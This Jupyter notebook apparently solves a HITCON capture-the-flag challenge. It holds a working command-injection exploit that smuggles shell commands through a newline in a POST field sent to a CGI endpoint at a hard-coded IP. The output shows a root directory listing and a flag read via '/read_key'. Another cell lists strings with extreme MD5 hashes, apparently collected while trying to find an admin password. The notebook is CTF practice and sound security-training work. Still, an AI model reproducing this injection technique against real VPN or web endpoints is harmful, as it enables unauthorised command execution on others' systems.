notebook.community

Edit and run



In [2]:

    
import requests



In [10]:

    
headers = dict()
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess":"../etc/passwd"} # doesn't matter
cmd =" ls /"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]









    



bin
boot
dev
etc
home
initrd.img
key.txt
lib
lib64
lost+found
media
mnt
opt
proc
read_key
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz



In [11]:

    
cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]









    



HITCON{a755be06b165ed8fc4710d3544fce942}



In [9]:

    
# BTW, attempts to find an admin password
# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
class ListTable(list):
    """ Overridden list class which takes a 2-dimensional list of 
        the form [[1,2,3],[4,5,6]], and renders an HTML Table in 
        IPython Notebook. """
    
    def _repr_html_(self):
        html = ["<table>"]
        for row in self:
            html.append("<tr>")            
            html.extend("<td>{0}</td>".format(col) for col in row)            
            html.append("</tr>")
        html.append("</table>")
        return ''.join(html)
    
from hashlib import md5
L =[  "djGFYmi", "ZkjAFaaaa", 
          "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
         "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
        "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),       
         'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG', 'http://weijr-eng.blogspot.com               GE\x00\x00\x0f\xe5\xef\x0b']
L+=[ 'b81.org/kpoz&AV' , 'b81.org/GD9FD&Sa', 'b81.org/S27Mp1Ya', 'http://weijr-eng.blogspot.com               \xbf\x13\x00\x00\xbd\xae\xcb`']
L+=['http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4', 'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c']
S = sorted( (md5(x).hexdigest(), x) for x in L )
ListTable([['Leading 0 or f', 'md5 hexdigest', 'plaintext']]+[[[i for i in range(len(s[0])-1) if s[0][i]!=s[0][i+1]][0]+1, s[0], repr(s[1])] for s in S])









    Out[9]:




Leading 0 or f md5 hexdigest plaintext
13 000000000000079ad03b44781b4e6c59 'http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4'
12 0000000000006c32a237fc882cc44a4b 'U\xfd\xe9\xa4.\x08\xbb\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
12 0000000000008d003b0ffcf6b666342e 'xIoN=JG'
11 00000000000277ec3301b3cabacb95c9 '\x1b\xf26\xfe\xf2\x0b\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
11 00000000000639f3eb26b63f0a7baca3 'ZkjAFaaaa'
11 00000000000b814f9865b26c0ebb4136 'Kdr.b4v'
11 00000000000ccda838e4b06d6d662dca 'djGFYmi'
10 000000000016deedb58402856305e702 'b81.org/GD9FD&Sa'
10 ffffffffffe538aaef4811a59ec8af0f 'b81.org/S27Mp1Ya'
10 ffffffffffe9b60be6c8e43b80c29582 'http://weijr-eng.blogspot.com               \xbf\x13\x00\x00\xbd\xae\xcb`'
11 fffffffffff5d05f4b93da2870f43376 'K1UgX15KGWDJKTdo'
11 fffffffffff8821c53918df398cda5d8 'b81.org/kpoz&AV'
11 fffffffffffd880637cda3008c943ce6 'http://weijr-eng.blogspot.com               GE\x00\x00\x0f\xe5\xef\x0b'
12 ffffffffffff4de6f952846ffc0f4d15 '\xe9\x96\xbf\x17\xaf\xa6\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
13 fffffffffffff194e10443811b0ca0cd 'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c'



In [10]:

    
with open('md5low','w') as f:
    f.write('http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'w') as f:
    f.write('http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c')



In [ ]:

Leading 0 or f	md5 hexdigest	plaintext
13	000000000000079ad03b44781b4e6c59	'http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4'
12	0000000000006c32a237fc882cc44a4b	'U\xfd\xe9\xa4.\x08\xbb\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
12	0000000000008d003b0ffcf6b666342e	'xIoN=JG'
11	00000000000277ec3301b3cabacb95c9	'\x1b\xf26\xfe\xf2\x0b\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
11	00000000000639f3eb26b63f0a7baca3	'ZkjAFaaaa'
11	00000000000b814f9865b26c0ebb4136	'Kdr.b4v'
11	00000000000ccda838e4b06d6d662dca	'djGFYmi'
10	000000000016deedb58402856305e702	'b81.org/GD9FD&Sa'
10	ffffffffffe538aaef4811a59ec8af0f	'b81.org/S27Mp1Ya'
10	ffffffffffe9b60be6c8e43b80c29582	'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`'
11	fffffffffff5d05f4b93da2870f43376	'K1UgX15KGWDJKTdo'
11	fffffffffff8821c53918df398cda5d8	'b81.org/kpoz&AV'
11	fffffffffffd880637cda3008c943ce6	'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b'
12	ffffffffffff4de6f952846ffc0f4d15	'\xe9\x96\xbf\x17\xaf\xa6\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
13	fffffffffffff194e10443811b0ca0cd	'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c'